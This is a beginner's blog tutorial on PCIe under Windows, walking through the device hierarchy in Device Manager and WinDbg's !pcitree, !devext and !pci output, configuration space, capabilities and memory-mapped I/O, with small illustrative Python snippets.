
A Practical Tutorial on PCIe for Total Beginners on Windows (Part 1)

14 February 2023 at 00:00

Foreword about the series

Hello! I have been speaking to some friends and coworkers lately who are interested in learning more about PCIe but feel intimidated by its complexity or the lack of simple resources for beginners. I have been working with PCIe a lot lately and felt it might be worth sharing some of my experience in the form of a blog post.

This post is intended for those with a background in computer systems who like to get their hands dirty. It is also intended for total beginners to PCIe, or for someone who is aware of the general concepts but is having trouble linking them together.

First things first: Do not be intimidated. There are a lot of acronyms and confusing concepts that become simple as you "get it". Take things one step at a time and don't be afraid to ask questions! (If you want to ask me questions, consider pinging me @Gbps in the #hardware channel in the Reverse Engineering Discord)

I intend to do a couple of things with this series:

  • Break PCIe down into what I feel is most important from the software side to learn and build a good baseline mental model for modern PC/server systems.
  • Show practical examples of investigating PCIe hierarchies and devices on Windows using various tools (usually WinDbg).
  • I will hand wave or omit some specific details intentionally to avoid confusion. Terminology here may be incorrect, even the information itself might be technically incorrect. But the purpose of this is to learn the system as a whole, not the specific details of the specification. PCIe is complex, and it is not worth getting caught up in too many details and corner-cases when building a beginner’s understanding.
  • Hopefully demystify this technology by relating it back to concepts you are already familiar with. PCIe did not re-invent the wheel, and you probably understand a lot more about it already than you realize by understanding technologies similar to it.

I do not intend to do the following things with this series:

  • Go into detail about legacy PCI or PCI-X. This technology is, in general, not important other than for historical interest.
  • Show you how to write a device driver for a PCIe device. This is very OS specific and is much higher level than what is going to be talked about here.
  • Go into detail about the hardware behind PCIe. More than half of the specification is spent on this subject and contains some of the most cutting-edge technology in the world for high speed data transfer. I do not deal with this side of the house, though I might in the future write about building PCIe devices with FPGAs (which I have done before).
  • Help you cheat in video games with PCIe. Yes, it exists. No, I will not help. Consider playing the game normally instead.

This is not a comprehensive look into the technology or the protocol. For a truly exhaustive look, you should refer to the ever elusive PCI-SIG PCI Express Base Specification. This is the specification on which all PCIe implementations are based. As of writing, we are on version 6.0 of this specification, but anything from 3.0 onwards is perfectly relevant for modern PCIe. How you acquire this expensive specification is an exercise left to the reader.

Without further ado, let’s talk about PCIe starting from square one.

NOTE: I will sometimes switch back and forth between “PCI” and “PCIe” when describing the technology as a force of habit. Everything in this series is about PCIe unless otherwise noted.

What is PCIe and why should I care?

PCIe stands for Peripheral Component Interconnect Express. It was first introduced in 2003 and evolved from the older PCI and PCI-X specifications that grew in popularity in the early PC era (with an added "e" for Express to differentiate it).

Most people who work with computers recognize it as the PCIe slot on their motherboard where they plug in graphics cards or adapter cards, but PCIe is way more than just these few extension ports. PCIe is the foundation of how a modern CPU speaks to practically every device connected to the system.

Since its introduction, PCIe's popularity has skyrocketed as a near universal standard for short-distance, high-speed data transmission. Nearly all M.2 SSDs use NVMe over PCIe as their transport protocol. Thunderbolt 3 brought the ability to dynamically hotplug PCIe devices directly into the system using an external cord (enabling technology such as docking stations and eGPUs). Building off of that, USB4 is in the process of extending Thunderbolt 3 to bring this PCIe routing technology to the open USB specification. New transports such as CXL for datacenter servers utilize PCIe as the base specification and extend their special sauce on top of it.

Even if the device being communicated with doesn't natively use PCIe as its physical layer protocol, the system must still use PCI's software interface to communicate. This is because the system uses adapters (often called Host Controllers), which are PCI devices that translate PCI requests from the CPU into whatever protocol or bus the Host Controller supports. For example, all USB 3.1 on this test machine goes through the USB XHCI protocol, a communication protocol that bridges PCIe to USB via a PCI driver communicating with the USB Host Controller.

[Image: a USB 3.1 Host Controller shown in Device Manager]

A USB 3.1 Host Controller. All USB on this system will happen through this controller, which is on the PCI bus.

Needless to say, PCI is running the show everywhere these days and has been fully adopted by all parts of the computing world. It is therefore important that we develop a good understanding of this technology to build a better understanding of modern computing.

Investigating a PCIe Hierarchy - A packet switched network

The biggest change from legacy PCI to PCIe was the move from a true bus topology to point-to-point links. You can think of this as the evolution from the Ethernet hubs of the past to the Ethernet switches of today. Each link is a separate point-to-point connection that is routed just like an Ethernet cord on a packet-switched Ethernet network. This means that PCIe is not actually a "bus protocol", despite the word "bus" being used confusingly all over the literature and technical specifications. One must carefully learn that this word "bus" does not mean multiple PCIe devices are talking on the same physical link. Packets (known as TLPs) travel across each individual link, and the switching devices in the hierarchy deliver each packet to the proper port using routing information within the packet.

Before we go into the technical details of PCIe, first we need to talk about how the whole system is laid out. The first way we will be investigating the hierarchy of PCIe is through the Windows Device Manager. Most people who are familiar with Windows have used it before, but not many people know about the very handy feature found in View > Devices by Connection.

[Image: Device Manager's View > Devices by connection menu option]

By selecting this view, we get to see the full topology of the system from the root PNP (Plug-N-Play) node. The PNP root node is the root of the tree of all devices on Windows, regardless of what bus or protocol they use. Every device, whether virtual or physical, is enumerated and placed onto this PNP tree, and this view of Device Manager lets us see its layout.

In particular, we are looking to find the layout of the PCI devices on the system. That way, we can begin to build a visual model of what the PCI tree looks like on this machine. To do that, we need to locate the root of the PCI tree: the Root Complex. The Root Complex (abbreviated RC) is the owner of all things PCIe on the system. It is located physically on the CPU silicon, and it acts as the host with which all PCIe devices exchange packets. It can be thought of as the bridge between software (the instructions executing on your machine) and hardware (the outside world of PCIe and RAM).

On this system, it is found in the PNP hierarchy here:

[Image: the PCI Express Root Complex node in the Device Manager tree]

NOTE: You might be asking now "if PCI runs the show, why isn't the PCI Root Complex at the top of the tree?" That is because the PCIe bus is not the initial layout of the system presented by firmware during boot. Instead, ACPI (Advanced Configuration and Power Interface) is what describes the existence of PCIe to the OS. While you would never see it in a PC, it is possible to describe a system with no PCI bus at all, with everything presented purely by ACPI. We will talk more about ACPI later, but for now do not worry about this too much; just know that ACPI is how firmware tells us where the Root Complex is located, which then helps the OS enumerate PCI devices in the tree.

So now we know that the Root Complex is the top of the PCIe tree. Let's take a look at what's underneath it:

[Image: the devices listed underneath the PCI Express Root Complex]

Unsurprisingly, there are many devices on this PCI bus. Here we can see all sorts of controllers responsible for Audio, Integrated Graphics, USB, Serial, and SATA. In addition, we see a few devices labeled PCI Express Root Port. A Root Port is a port on the Root Complex where another PCIe Endpoint (aka a physical 'device') or Switch (aka a 'router') can be connected. In specification terms, you will hear Endpoints referred to as Type 0 devices and Switches (or Bridges) referred to as Type 1 devices, because one is configured as a device to talk to and the other is configured as a device that routes packets. An RC will have as many root ports as it physically supports, that is, as many as can be connected to the CPU silicon. Some root ports on a CPU might be routed directly to a physical PCIe slot, while others might be routed to other types of slots such as an NVMe slot. A root port might also be routed to another PCIe switching device, which can route packets to multiple ports and therefore multiple Endpoints at once.

I will keep bringing this comparison back up because I feel it is important: if you already understand Ethernet switches, you already understand PCIe switches. You can imagine that these root ports are like Ethernet ports on your desktop computer. You could connect one directly to another device (such as a camera), or you could connect it to a switch like your home router/modem, which will switch packets to expose more connections with further devices and machines to talk to. In this case, the Ethernet cords are instead copper wires connecting one PCIe port to another PCIe port, thereby making it "point-to-point".

With this in mind, let's start diagramming this hierarchy (partially) so we can see it all laid out visually:

[Diagram: a partial view of the hierarchy, with the Root Complex at the top and the Bus 0 devices underneath]

In PCI, all “busses” on the system are identified with a number from 0 to 255 (inclusive). In addition, all devices are identified with a “device id” and a “function id”. This is often seen described as Bus/Device/Function, or simply BDF. In more correct specification terms, this would be known as a RID (Requestor ID). To reduce confusion, I will refer to it as a BDF. BDF is important because it specifically tells us where in the PCIe hierarchy the device is located so we can communicate with it.
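To make these identifiers concrete, here is a small Python sketch (my own illustration, not output from any Windows tool) that packs and unpacks a BDF into the 16-bit RID layout: 8 bits of bus, 5 bits of device, and 3 bits of function.

def bdf_to_rid(bus: int, device: int, function: int) -> int:
    # Pack a Bus/Device/Function into a 16-bit Requester ID.
    # Bus is 8 bits (0-255), device is 5 bits (0-31), function is 3 bits (0-7).
    assert 0 <= bus <= 0xFF and 0 <= device <= 0x1F and 0 <= function <= 0x7
    return (bus << 8) | (device << 3) | function

def rid_to_bdf(rid: int):
    # Unpack a 16-bit Requester ID back into (bus, device, function).
    return (rid >> 8) & 0xFF, (rid >> 3) & 0x1F, rid & 0x7

print(hex(bdf_to_rid(0, 2, 0)))  # 0x10 -- the BDF 0:2.0 we will see below
print(rid_to_bdf(0x10))          # (0, 2, 0)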

Because these are all on the top level of the hierarchy, we will give this "bus" the numerical identifier 0: it is "Bus 0", or the Root Bus. We can verify that all of these devices are Bus 0 devices by right clicking a top level device, selecting Properties, and looking at Location:

[Image: the Properties dialog of the integrated graphics device, showing its Location on PCI bus 0]

For this integrated graphics device, it is located with a BDF of 0:2.0. It is on Bus 0 (the Root Bus), a device id of 2, and a function id of 0. A “device” in this case represents a physical device, such as a graphics card. A “function” is a distinct capability that the physical device exposes to the system. It can, for all intents and purposes, be thought of as a separate entity. A device which exposes more than one function is aptly known as a Multi-Function Device (MFD). That means it exposes two or more PCI connections to the system while only physically being one device. We will look at an example of a real MFD soon.

An astute reader will notice that we have already broken the "rule" I noted above: there are many devices connected to this singular Bus 0. This is the first exception to the "point-to-point" rule in PCIe, and it is only allowed in this case because Bus 0 is physically located on the silicon of the CPU. That is, there are no electrical traces between these devices; it is an imaginary connection. All of these devices exist inside the CPU package and are routed using the extremely high speed electrical interconnects within it. These processor interconnects use an internal protocol that is specific to the vendor of the CPU and is not publicly documented; however, we still communicate with them in the 'language' of PCIe. These endpoints (labelled in green), due to their special nature, are given a special name: Root Complex Integrated Endpoints (RCIE), because they are integrated directly on the Root Complex.

This shouldn't come as a surprise; you would expect devices such as the integrated UHD graphics to be physically located on the CPU (as it is part of the specifications of the CPU). But we can learn some more interesting topology of the system by observing other RCIEs, such as the fact that the RAM controller is also present here (the silicon which talks to the DRAM DIMMs of memory), as is the USB controller (the silicon which talks to external USB devices). This is why certain CPUs only support certain kinds of RAM and USB specifications: because the devices which communicate are physically located on the CPU and only support the specification they were physically created to support.

UPDATE: This statement is incorrect. Some IO controllers can still be found on a discrete chip called the PCH (Intel), also known as the chipset (AMD), which sits near the CPU and has a high speed link that makes it seem like it is integrated into the CPU silicon. The above sentence incorrectly says that you can find the USB controller on the physical CPU, where it is more likely to be on the "chipset". However, the memory controller that talks to RAM is found on the CPU die for speed purposes.

This diagram is a minimized version of the first level of the hierarchy, but now let’s build the rest of the hierarchy by expanding the rest of the Root Ports in the device manager.

[Image: Device Manager with the remaining Root Ports expanded]

And here’s what the filled in graph looks like:

[Diagram: the filled-in hierarchy, with the Root Ports and the devices beneath them]

Note: I have marked the BDF of the UHD Graphics device and Bus 0.

These root ports are physically located on the CPU, but the devices attached to them are not. There are 3 devices connected to the external PCIe slots on this machine: an NVIDIA Quadro P400 graphics card and two NVMe drives. By going to the properties of each of these in Device Manager, we can pull their BDF information and update the visual:

[Diagram: the hierarchy updated with the BDF of each device underneath the Root Ports]

Underneath each of the root ports, we can see a device is physically connected. But we can also see that a new Bus is exposed under each. The Root Port has acted as a Bridge: it has bridged us from Bus 0 onto a new bus, therefore the new bus must be assigned a new numerical ID, and all of the devices/functions underneath that port inherit that new bus number. This is the same logic used by the OS/firmware during bus enumeration at boot: all bridges and switches expose a new bus which must be assigned a new bus ID number.

In this case, we can also see a good example of a Multi-Function Device. The Quadro P400 graphics card is acting as an MFD with two functions. The first function is 0 (BDF 01:00.0) and is the graphics card device itself. The second function is 1 (BDF 01:00.1) and is the audio controller that allows audio to be played out of ports such as HDMI. These two functions are distinct: they serve entirely different purposes and have separate drivers and configuration associated with them, but they are still implemented by the same physical device, which is device 0, and are located on the same bus, which is bus 1. This is consistent with the point-to-point rule of PCIe: only one physical device can be connected to a link, therefore only one physical device can exist on the bus (other than the exception, Bus 0).

Exploring PCIe hierarchy and devices from WinDbg

So far we’ve seen a standard PCI bus hierarchy by using Device Manager’s “View by Connection” functionality. There is another more detailed way to investigate a PCIe hierarchy: using the trusty kernel debug extensions provided by WinDbg.

NOTE: It is assumed that you understand how to set up a kernel debugger on a machine to continue following along. You can also use LiveKD for most exercises. If you do not, please refer to the guide provided by Microsoft: Set up KDNET

I have connected to a new test machine, different from the one used above. We will walk through the process of graphing the hierarchy of this machine using the output of the debugger. We will also learn how to investigate information about a device through its configuration memory.

Once dropped into a debugger, we will start by using the !pcitree command. This will dump a textual tree diagram of the PCI devices enumerated on the system.

8: kd> !pcitree
Bus 0x0 (FDO Ext ffffdc89b9f75920)
  (d=0,  f=0) 80866f00 devext 0xffffdc89b0759270 devstack 0xffffdc89b0759120 0600 Bridge/HOST to PCI
  (d=1,  f=0) 80866f02 devext 0xffffdc89ba0c74c0 devstack 0xffffdc89ba0c7370 0604 Bridge/PCI to PCI
  Bus 0x1 (FDO Ext ffffdc89ba0aa190)
    No devices have been enumerated on this bus.
  (d=2,  f=0) 80866f04 devext 0xffffdc89ba0c94c0 devstack 0xffffdc89ba0c9370 0604 Bridge/PCI to PCI
  Bus 0x2 (FDO Ext ffffdc89ba0a8190)
    (d=0,  f=0) 10de13bb devext 0xffffdc89ba04f270 devstack 0xffffdc89ba04f120 0300 Display Controller/VGA
    (d=0,  f=1) 10de0fbc devext 0xffffdc89ba051270 devstack 0xffffdc89ba051120 0403 Multimedia Device/Unknown Sub Class
  (d=3,  f=0) 80866f08 devext 0xffffdc89ba0cb4c0 devstack 0xffffdc89ba0cb370 0604 Bridge/PCI to PCI
  Bus 0x3 (FDO Ext ffffdc89ba08f190)
    No devices have been enumerated on this bus.
  (d=5,  f=0) 80866f28 devext 0xffffdc89ba0cd4c0 devstack 0xffffdc89ba0cd370 0880 Base System Device/'Other' base system device
  (d=5,  f=1) 80866f29 devext 0xffffdc89ba0cf4c0 devstack 0xffffdc89ba0cf370 0880 Base System Device/'Other' base system device
  (d=5,  f=2) 80866f2a devext 0xffffdc89ba0d14c0 devstack 0xffffdc89ba0d1370 0880 Base System Device/'Other' base system device
  (d=5,  f=4) 80866f2c devext 0xffffdc89ba0d34c0 devstack 0xffffdc89ba0d3370 0800 Base System Device/Interrupt Controller
  (d=11, f=0) 80868d7c devext 0xffffdc89ba0d84c0 devstack 0xffffdc89ba0d8370 ff00 (Explicitly) Undefined/Unknown Sub Class
  (d=11, f=4) 80868d62 devext 0xffffdc89ba0da4c0 devstack 0xffffdc89ba0da370 0106 Mass Storage Controller/Unknown Sub Class
  (d=14, f=0) 80868d31 devext 0xffffdc89ba0dc4c0 devstack 0xffffdc89ba0dc370 0c03 Serial Bus Controller/USB
  (d=16, f=0) 80868d3a devext 0xffffdc89ba0de4c0 devstack 0xffffdc89ba0de370 0780 Simple Serial Communications Controller/'Other'
  (d=16, f=3) 80868d3d devext 0xffffdc89ba0e04c0 devstack 0xffffdc89ba0e0370 0700 Simple Serial Communications Controller/Serial Port
  (d=19, f=0) 808615a0 devext 0xffffdc89ba0e24c0 devstack 0xffffdc89ba0e2370 0200 Network Controller/Ethernet
  (d=1a, f=0) 80868d2d devext 0xffffdc89ba0e44c0 devstack 0xffffdc89ba0e4370 0c03 Serial Bus Controller/USB
  (d=1b, f=0) 80868d20 devext 0xffffdc89ba0254c0 devstack 0xffffdc89ba025370 0403 Multimedia Device/Unknown Sub Class
  (d=1c, f=0) 80868d10 devext 0xffffdc89ba0274c0 devstack 0xffffdc89ba027370 0604 Bridge/PCI to PCI
  Bus 0x4 (FDO Ext ffffdc89ba0a9190)
    No devices have been enumerated on this bus.
  (d=1c, f=1) 80868d12 devext 0xffffdc89ba02c4c0 devstack 0xffffdc89ba02c370 0604 Bridge/PCI to PCI
  Bus 0x5 (FDO Ext ffffdc89b9fe6190)
    No devices have been enumerated on this bus.
  (d=1c, f=3) 80868d16 devext 0xffffdc89ba02e4c0 devstack 0xffffdc89ba02e370 0604 Bridge/PCI to PCI
  Bus 0x6 (FDO Ext ffffdc89ba0a7190)
    (d=0,  f=0) 12838893 devext 0xffffdc89ba062270 devstack 0xffffdc89ba062120 0604 Bridge/PCI to PCI
    Bus 0x7 (FDO Ext ffffdc89ba064250)
      No devices have been enumerated on this bus.
  (d=1c, f=4) 80868d18 devext 0xffffdc89ba0304c0 devstack 0xffffdc89ba030370 0604 Bridge/PCI to PCI
  Bus 0x8 (FDO Ext ffffdc89ba0b2190)
    No devices have been enumerated on this bus.
  (d=1d, f=0) 80868d26 devext 0xffffdc89ba0364c0 devstack 0xffffdc89ba036370 0c03 Serial Bus Controller/USB
  (d=1f, f=0) 80868d44 devext 0xffffdc89ba0384c0 devstack 0xffffdc89ba038370 0601 Bridge/PCI to ISA
  (d=1f, f=2) 80868d02 devext 0xffffdc89ba03a4c0 devstack 0xffffdc89ba03a370 0106 Mass Storage Controller/Unknown Sub Class
  (d=1f, f=3) 80868d22 devext 0xffffdc89ba03c4c0 devstack 0xffffdc89ba03c370 0c05 Serial Bus Controller/Unknown Sub Class

NOTE: If you have an error Error retrieving address of PciFdoExtensionListHead, make sure your symbols are set up correctly and run .reload pci.sys to reload PCI’s symbols.

When presented with this output, it might be difficult to visually see the "tree" due to the way the whitespace is formatted. The way to interpret this output is to look at the indentation of the Bus 0x text. Anything indented one set of spaces further than a Bus 0x line is a device on that bus. We can also see other Bus 0x lines directly underneath a device. That means the device above the Bus 0x line is exposing a new bus to us, and the bus number is given there.

Let's take a look at a specific portion of this output:

Bus 0x0 (FDO Ext ffffdc89b9f75920)
  (d=0,  f=0) 80866f00 devext 0xffffdc89b0759270 devstack 0xffffdc89b0759120 0600 Bridge/HOST to PCI
  (d=1,  f=0) 80866f02 devext 0xffffdc89ba0c74c0 devstack 0xffffdc89ba0c7370 0604 Bridge/PCI to PCI
  Bus 0x1 (FDO Ext ffffdc89ba0aa190)
    No devices have been enumerated on this bus.
  (d=2,  f=0) 80866f04 devext 0xffffdc89ba0c94c0 devstack 0xffffdc89ba0c9370 0604 Bridge/PCI to PCI
  Bus 0x2 (FDO Ext ffffdc89ba0a8190)
    (d=0,  f=0) 10de13bb devext 0xffffdc89ba04f270 devstack 0xffffdc89ba04f120 0300 Display Controller/VGA
    (d=0,  f=1) 10de0fbc devext 0xffffdc89ba051270 devstack 0xffffdc89ba051120 0403 Multimedia Device/Unknown Sub Class
  (d=3,  f=0) 80866f08 devext 0xffffdc89ba0cb4c0 devstack 0xffffdc89ba0cb370 0604 Bridge/PCI to PCI
  Bus 0x3 (FDO Ext ffffdc89ba08f190)
    No devices have been enumerated on this bus.

In this output, we can see the BDF displayed of each device. We can also see a set of Root Ports that exist on Bus 0 that do not have any devices enumerated underneath, which means that the slots have not been connected to any devices.

It should be easier to see the tree structure here, but let's graph it out anyway:

[Diagram: the tree structure of the !pcitree output above]

NOTE: It is just a coincidence that the bus numbers happen to match up with the device numbers of the Bridge/PCI to PCI ports.

As you now know, the devices labelled Bridge/PCI to PCI are in fact Root Ports, and the device on Bus 2 is in fact a Multi-Function Device. Unlike in Device Manager, we don't see the true name of the device from !pcitree. Instead, we are just given a generic PCI name for the "type" the device advertises itself as. This is because Device Manager reads the name of the device from the driver and not directly from PCI.

To see more about what this Display Controller device is, we can use the command !devext [pointer], where [pointer] is the value directly after the word devext in the output. In this case, it is:

(d=0,  f=0) 10de13bb devext 0xffffdc89ba04f270 devstack 0xffffdc89ba04f120 0300 Display Controller/VGA
!devext 0xffffdc89ba04f270

From here, we will get a printout of a summary of this PCI device as seen from the PCI bus driver in Windows, pci.sys:

8: kd> !devext 0xffffdc89ba04f270
PDO Extension, Bus 0x2, Device 0, Function 0.
  DevObj 0xffffdc89ba04f120  Parent FDO DevExt 0xffffdc89ba0a8190
  Device State = PciStarted
  Vendor ID 10de (NVIDIA CORPORATION)  Device ID 13BB
  Subsystem Vendor ID 103c (HEWLETT-PACKARD COMPANY)  Subsystem ID 1098
  Header Type 0, Class Base/Sub 03/00  (Display Controller/VGA)
  Programming Interface: 00, Revision: a2, IntPin: 01, RawLine 00
  Possible Decodes ((cmd & 7) = 7): BMI
  Capabilities: Ptr=60, power msi express 
  Express capabilities: (BIOS controlled) 
  Logical Device Power State: D0
  Device Wake Level:          Unspecified
  WaitWakeIrp:                <none>
  Requirements:     Alignment Length    Minimum          Maximum
    BAR0    Mem:    01000000  01000000  0000000000000000 00000000ffffffff
    BAR1    Mem:    10000000  10000000  0000000000000000 ffffffffffffffff
    BAR3    Mem:    02000000  02000000  0000000000000000 ffffffffffffffff
    BAR5     Io:    00000080  00000080  0000000000000000 00000000ffffffff
      ROM BAR:      00080000  00080000  0000000000000000 00000000ffffffff
    VF BAR0 Mem:    00080000  00080000  0000000000000000 00000000ffffffff
  Resources:        Start            Length
    BAR0    Mem:    00000000f2000000 01000000
    BAR1    Mem:    00000000e0000000 10000000
    BAR3    Mem:    00000000f0000000 02000000
    BAR5     Io:    0000000000001000 00000080
  Interrupt Requirement:
    Line Based - Min Vector = 0x0, Max Vector = 0xffffffff
    Message Based: Type - Msi, 0x1 messages requested
  Interrupt Resource:    Type - MSI, 0x1 Messages Granted

There is quite a lot of information here that the kernel knows about this device. This information was retrieved through Configuration Space (abbrev. "config space"), a section of memory on the system which allows the kernel to enumerate, query info about, and set up PCI devices in a standardized way. The software reads memory from the device to query information such as the Vendor ID, and the device (if it is powered on) responds with that information. In the next section, I will discuss more about how this actually takes place, but know that the information queried here was produced from config space.

So let’s break down the important stuff:

  • DevObj: The pointer to the nt!_DEVICE_OBJECT structure which represents the physical device in the kernel.
  • Vendor ID: A 16-bit id number which is registered to a particular device manufacturer. This value is standardized, and new vendors must be assigned a unique ID by the PCI-SIG so they do not overlap. In this case, we see this is a NVIDIA graphics card.
  • Device ID: A 16-bit id number for the particular chip doing PCIe. Similar idea in that a company must request a unique ID for their chip so it doesn’t conflict with any others.
  • Subsystem Vendor ID: The vendor id of the board the chip sits on. In this case, “HP” is the producer of the graphics card, and “NVIDIA” designed the graphic chip.
  • Subsystem Device ID: The device id of the board the chip sits on.
  • Logical Device Power State: The power state of this device. There are two major power states in PCI: D0 (device is powered on) and D3 (device is in a low-power state, or completely off).
  • Requirements: The memory requirements the device is asking the OS to allocate for it. More on this later.
  • Resources: The memory resources assigned to this device by the OS. This device is powered on and started already, so it already has its resources assigned.
  • Interrupt Requirement/Resource: Same as above, except for interrupts.
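Several of the identification fields above (Vendor ID, Device ID, the Subsystem IDs) live at fixed offsets in the standard configuration header. As a small illustration (my own sketch, not pci.sys code; cfg is assumed to hold a raw snapshot of the function's config space), here is how they could be pulled out by hand:

def parse_common_header(cfg: bytes) -> dict:
    # Offsets below match the 'Common Header' layout shown in the !pci dump
    # later in this post; they are fixed by the PCI specification.
    u16 = lambda off: int.from_bytes(cfg[off:off + 2], "little")
    return {
        "vendor_id":     u16(0x00),  # 10de (NVIDIA) for the device above
        "device_id":     u16(0x02),  # 13bb
        "subsys_vendor": u16(0x2C),  # 103c (HP)
        "subsys_id":     u16(0x2E),  # 1098
        "header_type":   cfg[0x0E],  # bit 7 set = multi-function device
    }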

To actually get the full information about this device, we can use the fantastic tool at PCI Lookup to query the public information about PCI devices registered with the PCI-SIG. Let’s put the information about the device and vendor ID into the box:

[Image: the PCI Lookup search form with the vendor and device IDs entered]

And when we search, we get back this:

[Image: the PCI Lookup search results]

Which tells us this device is a Quadro K620 graphics card created by NVIDIA. The subsystem ID tells us that this particular card's PCB was produced by HP, under license from NVIDIA.

What we saw in !devext is a good overview of what pci.sys specifically cares about showing us in the summary, but it only scratches the surface of all of the information in config space. To dump everything in configuration space, we can use the extension !pci 100 B D F, where B D F is the BDF of the device in question. 100 is a set of flags specifying that we want to dump all information about the device. The information displayed is laid out in the order it exists in the config space of the device. Prefixing each value is an offset, such as 02 for device id. This specifies the offset into config space that the value was read from. These offsets are detailed in the PCI specification and do not change between PCI versions, for backwards compatibility purposes.

8: kd> !pci 100 2 0 0

PCI Configuration Space (Segment:0000 Bus:02 Device:00 Function:00)
Common Header:
    00: VendorID       10de Nvidia Corporation
    02: DeviceID       13bb
    04: Command        0507 IOSpaceEn MemSpaceEn BusInitiate SERREn InterruptDis 
    06: Status         0010 CapList 
    08: RevisionID     a2
    09: ProgIF         00 VGA
    0a: SubClass       00 VGA Compatible Controller
    0b: BaseClass      03 Display Controller
    0c: CacheLineSize  0000
    0d: LatencyTimer   00
    0e: HeaderType     80
    0f: BIST           00
    10: BAR0           f2000000
    14: BAR1           e000000c
    18: BAR2           00000000
    1c: BAR3           f000000c
    20: BAR4           00000000
    24: BAR5           00001001
    28: CBCISPtr       00000000
    2c: SubSysVenID    103c
    2e: SubSysID       1098
    30: ROMBAR         00000000
    34: CapPtr         60
    3c: IntLine        00
    3d: IntPin         01
    3e: MinGnt         00
    3f: MaxLat         00
Device Private:
    40: 1098103c 00000000 00000000 00000000
    50: 00000000 00000001 0023d6ce 00000000
    60: 00036801 00000008 00817805 fee001f8
    70: 00000000 00000000 00120010 012c8de1
    80: 00003930 00453d02 11010140 00000000
    90: 00000000 00000000 00000000 00040013
    a0: 00000000 00000006 00000002 00000000
    b0: 00000000 01140009 00000000 00000000
    c0: 00000000 00000000 00000000 00000000
    d0: 00000000 00000000 00000000 00000000
    e0: 00000000 00000000 00000000 00000000
    f0: 00000000 00000000 00000000 00000000
Capabilities:
    60: CapID          01 PwrMgmt Capability
    61: NextPtr        68
    62: PwrMgmtCap     0003 Version=3
    64: PwrMgmtCtrl    0008 DataScale:0 DataSel:0 D0 

    68: CapID          05 MSI Capability
    69: NextPtr        78
    6a: MsgCtrl        64BitCapable MSIEnable MultipleMsgEnable:0 (0x1) MultipleMsgCapable:0 (0x1)
    6c: MsgAddrLow     fee001f8
    70: MsgAddrHi      0
    74: MsgData        0

    78: CapID          10 PCI Express Capability
    79: NextPtr        00
    7a: Express Caps   0012 (ver. 2) Type:LegacyEP
    7c: Device Caps    012c8de1
    80: Device Control 3930 bcre/flr MRR:1K NS ap pf ET MP:256 RO ur fe nf ce
    82: Device Status  0000 tp ap ur fe nf ce
    84: Link Caps      00453d02
    88: Link Control   0140 es CC rl ld RCB:64 ASPM:None 
    8a: Link Status    1101 SCC lt lte NLW:x16 LS:2.5 
    9c: DeviceCaps2    00040013 CTR:3 CTDIS arifwd aor aoc32 aoc64 cas128 noro ltr TPH:0 OBFF:1 extfmt eetlp EETLPMax:0
    a0: DeviceControl2 0000 CTVal:0 ctdis arifwd aor aoeb idoreq idocom ltr OBFF:0 eetlp

Enhanced Capabilities:
    100: CapID         0002 Virtual Channel Capability
         Version       1
         NextPtr       258
    0104: Port VC Capability 1        00000000
    0108: Port VC Capability 2        00000000
    010c: Port VC Control             0000
    010e: Port VC Status              0000
    0110: VC Resource[0] Cap          00000000
    0114: VC Resource[0] Control      800000ff
    011a: VC Resource[0] Status       0000

    258: CapID         001e L1 PM SS Capability
         Version       1
         NextPtr       128
    25c: Capabilities  0028ff1f  PTPOV:5 PTPOS:0 PCMRT:255 L1PMS ASPML11 ASPML12 PCIPML11 PCIPML12
    260: Control1      00000000  LTRL12TS:0 LTRL12TV:0 CMRT:0 aspml11 aspml12 pcipml11 pcipml12
    264: Control2      00000028  TPOV:5 TPOS:0

    128: CapID         0004 Power Budgeting Capability
         Version       1
         NextPtr       600

    600: CapID         000b Vendor Specific Capability
         Version       1
         NextPtr       000
         Vendor Specific ID 0001 - Ver. 1  Length: 024

The nice thing about this view is that we can see detailed information about the Capabilities section of config space. Capabilities is a set of structures within config space that describes exactly what features the device is capable of, including information such as link speed and what kinds of interrupts the device supports. Any new features added to the PCI specification are advertised through these structures, and the structures form a linked list in config space that can be iterated to discover all capabilities of the device. Not all of these capabilities are relevant to the OS; some are relevant only to aspects of hardware not covered by this post. For now, I won't go into any further details of the capabilities of this device.
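To make the linked-list layout concrete, here is a hedged Python sketch of walking the classic capability list, given the same kind of raw config space snapshot as before. The offsets come straight from the header we just dumped: the Status register at 0x06 (bit 4 indicates a capability list is present), CapPtr at 0x34, and the ID/next-pointer byte pair at the start of each capability.

def walk_capabilities(cfg: bytes):
    # Yield (offset, cap_id) for each capability in classic config space.
    status = int.from_bytes(cfg[0x06:0x08], "little")
    if not (status & 0x10):        # Status bit 4 = capability list present
        return
    ptr = cfg[0x34] & 0xFC         # CapPtr; bottom two bits are reserved
    while ptr:
        yield ptr, cfg[ptr]        # byte 0 of a capability is its ID
        ptr = cfg[ptr + 1] & 0xFC  # byte 1 points to the next capability

For the Quadro above, this would yield (0x60, 0x01) for power management, (0x68, 0x05) for MSI, and (0x78, 0x10) for PCI Express, matching the dump. (The Enhanced Capabilities at offset 100 and beyond use a different, wider structure and would need a separate walker.)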

PCIe: It’s all about memory

So now that we've investigated a few devices and the hierarchy of a PCI bus, let's talk about how communication between software and PCI devices actually works. When I was first learning about PCI, I had a lot of trouble understanding what exactly happens when software interfaces with a PCI device. Because the entire transaction is abstracted away from you as the software developer, it's hard to build a mental model of what's going on by just poking at PCI memory from a debugging tool. Hopefully this writeup provides a better overview than what I was able to get when I was first starting out.

First off, I will make a bold statement: All modern PCIe communication is done through memory reads and writes. If you understand how memory in PCIe works, you will understand how PCIe software communication works. (Yes, there are other legacy ways to communicate on certain platforms, but we will not discuss those because they are deprecated.)

Now, let's talk about the different types of memory on a modern platform. From very early in boot, your CPU uses virtual memory. That is, the memory addresses seen by your CPU are a view of memory mapped onto the physical memory world.

For our purposes, there are two types of physical memory on a system:

  • RAM - Addresses that, when read or written, store to and retrieve from the DRAM DIMMs on your machine. This is what most people think of when they think "memory".
  • Device Memory - Addresses that, when read or written, talk to a device on the system. The keyword here is talks. It does not store memory on the device, it does not retrieve memory on the device (although the device might be able to do both). The address you are talking to might not even be memory at all, but a more ethereal "device register" that configures the inner workings of the device. It is up to the device what happens with this kind of access. All you are doing is communicating with a device. You will typically see this referred to as MMIO, which stands for Memory-Mapped I/O.

NOTE: Device memory for PCI will always read “all 1s” or “all FFs” whenever a device does not respond to the address accessed in a device memory region. This is a handy way to know when a device is actually responding or not. If you see all FFs, you know you’re reading invalid device addresses.

